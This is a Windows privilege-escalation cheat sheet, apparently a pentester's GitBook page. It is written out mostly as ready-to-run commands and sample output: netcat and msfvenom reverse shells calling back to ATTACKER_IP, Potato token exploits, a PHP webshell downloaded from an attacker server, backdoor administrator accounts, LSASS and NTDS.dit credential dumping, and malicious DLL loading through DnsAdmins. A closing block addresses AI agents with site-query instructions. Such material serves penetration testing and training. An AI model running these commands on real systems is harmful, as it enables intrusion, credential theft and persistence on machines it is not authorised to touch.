> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/windows-priv-esc/windows-privilege-abuse.md).

# Windows Privilege Abuse

## Recovered Local Admin Credentials

If you recover a valid local administrator password from configs, application storage, or credential hunting, use `runas` from a real `cmd.exe` prompt to start a process as that user.

Start a listener:

```bash
nc -nlvp 9001
```

From the target in `cmd.exe`:

```cmd
runas /user:Administrator "nc.exe -e cmd.exe ATTACKER_IP 9001"
```

Enter the recovered password when prompted:

```
Enter the password for Administrator:
Attempting to start nc.exe -e cmd.exe ATTACKER_IP 9001 as user "HOSTNAME\Administrator" ...
```

Successful callback:

```
connect to [ATTACKER_IP] from (UNKNOWN) [TARGET]
Microsoft Windows [Version 10.0.19044.1645]
C:\WINDOWS\system32>
```

Notes:

* Run it from `cmd.exe`; this path may fail or behave differently from a PowerShell prompt.
* This requires an interactive password prompt. If you cannot interact with the prompt, use another credentialed execution path such as SMB/WinRM tooling when available.
* Confirm the spawned context with `whoami /all`.

## SeImpersonate / SeAssignPrimaryToken

### Overview

* Service accounts (IIS, MSSQL, etc.) often have SeImpersonatePrivilege
* Allows impersonating a privileged account such as NT AUTHORITY\SYSTEM
* "Potato" style attacks trick a SYSTEM process into connecting to our process, handing over its token

### Check for the Privilege

```cmd
whoami /priv
```

* Look for `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege`

### JuicyPotato (< Windows Server 2019 / Win10 1809)

```cmd
JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
```

### PrintSpoofer (Windows Server 2019+ / Win10 1809+)

```cmd
PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
```

If PrintSpoofer finds `SeImpersonatePrivilege` but fails or times out, try another Potato family exploit instead of assuming the privilege is unusable.

#### XAMPP Apache webshell to SYSTEM

If a Windows XAMPP target lets a low-privileged user write into the web root, plant a PHP webshell to pivot into the Apache service account and check its token privileges.

Use `C:\xampp\htdocs` directly if `/uploads` is periodically moved or cleaned:

```powershell
cd C:\xampp\htdocs
Invoke-WebRequest -Uri http://ATTACKER_IP:8000/simple-backdoor.php -UseBasicParsing -OutFile simple-backdoor.php
```

Confirm the Apache context and `SeImpersonatePrivilege` through the webshell:

```
http://TARGET/simple-backdoor.php?cmd=whoami
craft\apache

http://TARGET/simple-backdoor.php?cmd=whoami /all
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
```

Create a reverse shell payload, then upload it and PrintSpoofer into `htdocs`:

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=80 -f exe -o shell.exe
```

```powershell
Invoke-WebRequest -Uri http://ATTACKER_IP:8000/shell.exe -UseBasicParsing -OutFile C:\xampp\htdocs\shell.exe
Invoke-WebRequest -Uri http://ATTACKER_IP:8000/PrintSpoofer64.exe -UseBasicParsing -OutFile C:\xampp\htdocs\PrintSpoofer64.exe
```

Start a listener, then trigger PrintSpoofer from the Apache context:

```cmd
C:\xampp\htdocs\PrintSpoofer64.exe -c "C:\xampp\htdocs\shell.exe"
```

Successful shell:

```
connect to [ATTACKER_IP] from (UNKNOWN) [TARGET] PORT
whoami
nt authority\system
```

### GodPotato

```cmd
GodPotato.exe -cmd "cmd.exe /c C:\path\to\shell.exe"
GodPotato.exe -cmd "cmd.exe /c net user admin admin123 /add"
GodPotato.exe -cmd "cmd.exe /c net localgroup Administrators admin /add"
```

Good indicators:

```
CurrentUser: NT AUTHORITY\NETWORK SERVICE
Find System Token : True
CurrentUser: NT AUTHORITY\SYSTEM
process start with pid <pid>
```

#### GodPotato service payload

If a direct reverse payload starts but dies, use GodPotato to create and start a service that runs as LocalSystem.

Create a service executable:

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=80 -f exe-service -o service.exe
```

Stage a service creation script in the same writable directory as the payload:

```cmd
certutil.exe -urlcache -f http://ATTACKER_IP:8000/service.exe service.exe

echo 'sc create "meter" binPath= "C:\Windows\System32\spool\drivers\color\service.exe"' > service.bat
echo 'net start meter' >> service.bat
# check 
cat service.bat
```

Run the script through GodPotato:

```cmd
GodPotato.exe -cmd "cmd /c C:\Windows\System32\spool\drivers\color\service.bat"
```

Successful output:

```
CurrentUser: NT AUTHORITY\NETWORK SERVICE
Find System Token : True
CurrentUser: NT AUTHORITY\SYSTEM
[SC] CreateService SUCCESS
The meter service is starting
Meterpreter session opened
```

### PrintNotifyPotato

Use the .NET 4.6 build when available:

```cmd
PrintNotifyPotato-NET46.exe whoami
```

Successful indicators:

```
Create PrintNotify Success!
Got Token
CurrentUser: NT AUTHORITY\SYSTEM
DuplicateTokenEx Success!
process start with pid <pid>
```

### SigmaPotato

SigmaPotato can run privileged account-management commands:

```cmd
SigmaPotato.exe "net user ice-wzl Lab123 /add"
SigmaPotato.exe "net localgroup Administrators ice-wzl /add"
SigmaPotato.exe "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
```

Then authenticate remotely with the new local admin:

```bash
impacket-psexec ice-wzl:'Lab123'@TARGET
```

### RoguePotato

* Alternative to JuicyPotato for newer Windows versions
* <https://github.com/antonioCoco/RoguePotato>

### Common Scenario: MSSQL xp\_cmdshell

```bash
mssqlclient.py sql_dev@10.129.43.30 -windows-auth
```

```sql
enable_xp_cmdshell
xp_cmdshell whoami /priv
xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
```

## SeDebugPrivilege

### Overview

* Allows attaching to or opening any process, even those owned by SYSTEM
* Often assigned to developers for debugging
* Can dump LSASS for credential theft or spawn a SYSTEM child process

### Dump LSASS with ProcDump

```cmd
procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

### Extract Hashes with Mimikatz

```
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
```

### Alternative: Task Manager LSASS Dump

* Details tab > right-click lsass.exe > "Create dump file"
* Download and process offline with Mimikatz

### RCE as SYSTEM via Parent Process

* Use psgetsys.ps1 to spawn a child process inheriting a SYSTEM parent token
* Target winlogon.exe (runs as SYSTEM)

```powershell
[MyProcess]::CreateProcessFromParent((Get-Process lsass).Id, "C:\Windows\System32\cmd.exe", "")
```

## SeTakeOwnershipPrivilege

### Overview

* Grants ability to take ownership of any securable object (files, folders, registry, services)
* Can read protected files by taking ownership then modifying ACLs

### Enable the Privilege

```powershell
Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1
```

### Take Ownership and Read File

```cmd
takeown /f "C:\Department Shares\Private\IT\cred.txt"
icacls "C:\Department Shares\Private\IT\cred.txt" /grant htb-student:F
type "C:\Department Shares\Private\IT\cred.txt"
```

### Interesting Files to Target

```
c:\inetpub\wwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
```

## SeBackupPrivilege (Backup Operators Group)

### Overview

* Allows traversing any folder and copying files regardless of ACLs
* Must use `FILE_FLAG_BACKUP_SEMANTICS` flag (not standard copy)
* Members can log in locally to Domain Controllers

### Enable and Use

```powershell
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
```

### Copy NTDS.dit from Domain Controller

```
diskshadow.exe
> set verbose on
> set metadata C:\Windows\Temp\meta.cab
> set context clientaccessible
> set context persistent
> begin backup
> add volume C: alias cdrive
> create
> expose %cdrive% E:
> end backup
> exit
```

```powershell
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
```

```cmd
reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV
```

### Extract Hashes

```bash
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
```

```powershell
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
```

### Domain Admin diskshadow

When you are a domain administrator already and want to get all hashes via diskshadow

```
diskshadow.exe
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit

dir E:\Windows\NTDS\ntds.dit
copy E:\Windows\NTDS\ntds.dit \\TSCLIENT\tools\ntds.dit
reg save HKLM\SYSTEM SYSTEM.SAV
copy SYSTEM.sav \\TSCLIENT\tools\SYSTEM.sav
impacket-secretsdump -ntds ntds.dit -system SYSTEM.sav LOCAL
```

### Robocopy Alternative

```cmd
robocopy /B E:\Windows\NTDS .\ntds ntds.dit
```

## Event Log Readers Group

* Members can read Security event logs
* If process command line auditing is enabled (Event ID 4688), may find passwords in logs

```powershell
wevtutil qe Security /rd:true /f:text | Select-String "/user"
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
```

## DnsAdmins Group

### Attack: Load Malicious DLL via DNS Service

```bash
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
```

```cmd
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
sc stop dns
sc start dns
```

### Cleanup

```cmd
reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll
sc start dns
```

### WPAD Record Attack (Alternative)

```powershell
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3
```

## Print Operators Group (SeLoadDriverPrivilege)

* Can load vulnerable kernel drivers (e.g., Capcom.sys)

```cmd
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
EnableSeLoadDriverPrivilege.exe
.\ExploitCapcom.exe
```

* Automate with EoPLoadDriver: `EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys`
* Note: Not exploitable since Windows 10 Version 1803

## Server Operators Group

* Members have SERVICE\_ALL\_ACCESS on many services
* Can modify service binary path and restart services

```cmd
sc config AppReadiness binpath= "cmd /c net localgroup Administrators server_adm /add"
sc start AppReadiness
```

## Hyper-V Administrators

* Full access to all Hyper-V features
* If DCs are virtualized, consider them Domain Admins
* Can clone live DC, mount virtual disk offline, extract NTDS.dit


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/windows-priv-esc/windows-privilege-abuse.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.